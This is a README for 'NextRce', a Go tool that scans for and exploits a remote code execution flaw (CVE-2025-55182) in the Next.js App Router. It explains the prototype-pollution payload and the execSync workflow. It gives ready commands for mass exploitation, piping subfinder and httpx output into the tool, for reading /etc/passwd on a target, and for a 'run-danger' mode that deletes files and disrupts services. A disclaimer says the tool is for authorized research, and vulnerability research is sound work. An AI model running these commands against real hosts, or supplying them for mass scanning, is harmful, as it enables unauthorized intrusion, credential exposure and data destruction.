## https://sploitus.com/exploit?id=F753A008-8819-5887-8D0E-33EC429C985C
# CVE-2025-55182 - Next.js RSC Remote Code Execution Exploit
[](https://golang.org/)
[](https://nvd.nist.gov/)
[](LICENSE)
Next.js App Router Remote Code Execution Vulnerability Scanner
High-Performance Go Edition
---
## ๐ Description
**CVE-2025-55182** is a critical Remote Code Execution vulnerability in Next.js App Router. This high-performance security tool is designed to detect and exploit this vulnerability. It specifically targets the **React Server Components (RSC)** implementation within the Next.js **App Router** architecture.
By manipulating the serialization process in Server Actions, NextRce injects a crafted payload to achieve **Remote Code Execution (RCE)** on vulnerable instances. It features a smart detection engine that automatically distinguishes between vulnerable App Router architectures and safe legacy Pages Routers, ensuring efficiency during mass scans.
## ๐ Key Features
* **Smart Architecture Detection:** Heuristically analyzes the DOM (looking for \`window.__next_f\`) to identify vulnerable **App Router** targets vs. legacy Pages Router sites.
* **Pipeline & CI/CD Ready:** Fully supports \`stdin\` piping. Seamlessly integrates with reconnaissance tools like \`subfinder\`, \`httpx\`, and \`gau\`.
* **High-Performance Concurrency:** Built with Go goroutines and worker pools for scanning thousands of domains concurrently with minimal resource overhead.
* **Auto-Parsing:** Automatically extracts valid URLs from mixed input formats (e.g., status codes, titles, or raw logs).
* **Live RCE Feedback:** Executes commands and retrieves the output directly from the server's response digest.
* **Structured Logging:** Zap logger with colorful console output and JSON file logging for better debugging.
* **Organized Output:** Separate folders for logs, results, commands, and targets with UTF-8 encoding support.
* **Proxy Support:** Full support for HTTP/HTTPS proxies (e.g., Burp Suite, Caido) for deep analysis.
## ๐ Technical Analysis
### The Vulnerability (CVE-2025-55182)
Next.js App Router utilizes a custom serialization format for React Server Components (RSC). The vulnerability exists in the deserialization logic of \`Next-Action\` headers. When a specifically crafted object (polluting the \`__proto__\`) is sent to a server action endpoint (e.g., \`/adfa\`), the internal parser can be coerced into executing arbitrary Node.js code via \`child_process\`.
### Exploit Workflow
1. **Reconnaissance:** NextRce sends a benign probe to check for \`X-Powered-By: Next.js\` headers and specific path structures (\`/_next/\`).
2. **Fingerprinting:** It scans the response body for the App Router hydration marker:
* \`window.__next_f\` -> **Vulnerable (App Router)**
* \`__NEXT_DATA__\` -> **Safe (Pages Router)**
3. **Payload Injection:** If the architecture is vulnerable, NextRce constructs a multipart/form-data request with a serialized malicious JSON object targeting the prototype.
4. **Execution & Exfiltration:** The payload forces the server to run \`execSync(cmd)\`. The \`stdout\` is base64 encoded and returned in the \`digest\` field of the server's error response, which NextRce decodes and displays.
## ๐ ๏ธ Installation
### Prerequisites
- Go 1.25 or higher
- Make (optional, for easy building)
\`\`\`bash
# Clone the repository
git clone https://github.com/ynsmroztas/NextRce.git
# Navigate to the directory
cd NextRce
# Build using Makefile (recommended)
make build
# OR build manually
go build -o nextrce nextrce.go
# The binary will be created as 'nextrce'
\`\`\`
### Folder Structure
After building, the tool will automatically create these folders:
- \`targets/\` - Store your target URL files here
- \`commands/\` - Store your command files here
- \`logs/\` - Scan logs (JSON format)
- \`results/\` - Scan results (successful, failed, vulnerable targets)
## ๐ป Usage Examples
### 1. Using Makefile (Recommended)
The easiest way to use NextRce with organized folder structure.
```bash
# Run with SAFE commands only (reconnaissance)
make run-safe
# Run with DANGEROUS commands (โ ๏ธ 60 second countdown warning)
make run-danger
# Run with ALL commands from commands/ directory
make run-full
# View scan results
make show-results
# Open results folder
make open-results
# Clean logs and results
make clean-logs
```
### 2. Pipeline / Bug Bounty Mode
NextRce supports stdin piping for integration with reconnaissance tools.
\`\`\`bash
# Scan subdomains, filter live hosts, and exploit immediately
subfinder -d target.com -silent | httpx -sc -td -title -server -silent | ./nextrce -c "id" -t 50 -v
\`\`\`
### 3. Single Target Scan
Test a specific endpoint with a custom command.
\`\`\`bash
./nextrce -u https://vulnerable.target.com -c "cat /etc/passwd" -v
\`\`\`
### 4. Directory-Based Scanning
Scan multiple target files and command files from directories.
\`\`\`bash
# Scan all .txt files in targets/ with all .txt files in commands/
./nextrce -l targets/ -cl commands/ -t 50 -v
\`\`\`
### 5. Single File Scanning
Scan from specific files.
\`\`\`bash
# Scan targets/urls.txt with commands/commands_safe.txt
./nextrce -l targets/urls.txt -cl commands/commands_safe.txt -t 100 -v
\`\`\`
### 6. Proxy Mode (Debug)
Route traffic through Burp Suite or another proxy for analysis.
\`\`\`bash
./nextrce -u https://target.com -c "whoami" -p http://127.0.0.1:8080 -v
\`\`\`
## โ๏ธ Command Line Options
| Flag | Description | Default |
| :--- | :--- | :--- |
| \`-u\` | Single target URL to scan | \`None\` |
| \`-l\` | File or directory path containing target URLs (supports .txt files) | \`None\` |
| \`-c\` | Single command to execute | \`id\` |
| \`-cl\` | File or directory path containing commands (supports .txt files) | \`None\` |
| \`-t\` | Number of concurrent workers | \`30\` |
| \`-p\` | HTTP Proxy URL (e.g., http://127.0.0.1:8080) | \`None\` |
| \`-v\` | Enable verbose output (show failed attempts and safe targets) | \`false\` |
## ๐ Output Files
All results are saved in the \`results/\` directory with UTF-8 encoding:
| File | Description |
| :--- | :--- |
| \`successful_targets.txt\` | Targets with successful RCE (includes commands and responses) |
| \`vulnerable_targets.txt\` | All vulnerable targets (App Router detected) |
| \`failed_targets.txt\` | Targets where RCE failed |
| \`rce_details.txt\` | Detailed RCE execution results with timestamps |
Logs are saved in \`logs/nextrce.log\` in JSON format for easy parsing.
## ๐ฏ Makefile Commands
| Command | Description |
| :--- | :--- |
| \`make build\` | Compile the Go binary |
| \`make run\` | Run with ALL commands from directories |
| \`make run-safe\` | Run with SAFE commands only (reconnaissance) |
| \`make run-danger\` | Run with DANGEROUS commands (โ ๏ธ 60s countdown) |
| \`make run-full\` | Run with ALL commands from commands/ directory |
| \`make show-results\` | Display scan results summary in terminal |
| \`make open-results\` | Open results folder in Finder |
| \`make clean\` | Remove compiled binary |
| \`make clean-logs\` | Remove all logs and results |
| \`make help\` | Show all available commands |
## ๐ฅ What's New in Go Edition
- **โก High Performance:** Built with Go for maximum speed and efficiency
- **๐ Structured Logging:** Zap logger with colorful console and JSON file output
- **๐ Organized Structure:** Separate folders for targets, commands, logs, and results
- **๐ Directory Support:** Load all .txt files from directories automatically
- **๐พ UTF-8 Encoding:** Proper encoding for all output files
- **โ ๏ธ Safety Features:** 60-second countdown for dangerous commands
- **๐ Detailed Reports:** Comprehensive scan statistics and success rates
- **๐ฏ Multiple Run Modes:** Safe, danger, and full scan options
## โ ๏ธ Disclaimer
This tool is developed for **educational and security research purposes only**.
The author (**Mitsec**) is not responsible for any illegal use, damage, or unauthorized access caused by this tool.
Always obtain explicit permission from the system owner before performing any security testing.
**โ ๏ธ WARNING:** The \`make run-danger\` command executes DESTRUCTIVE commands that can:
- Delete files and directories
- Modify system configurations
- Disrupt services
- Cause data loss
Use with extreme caution and only on systems you own or have explicit permission to test.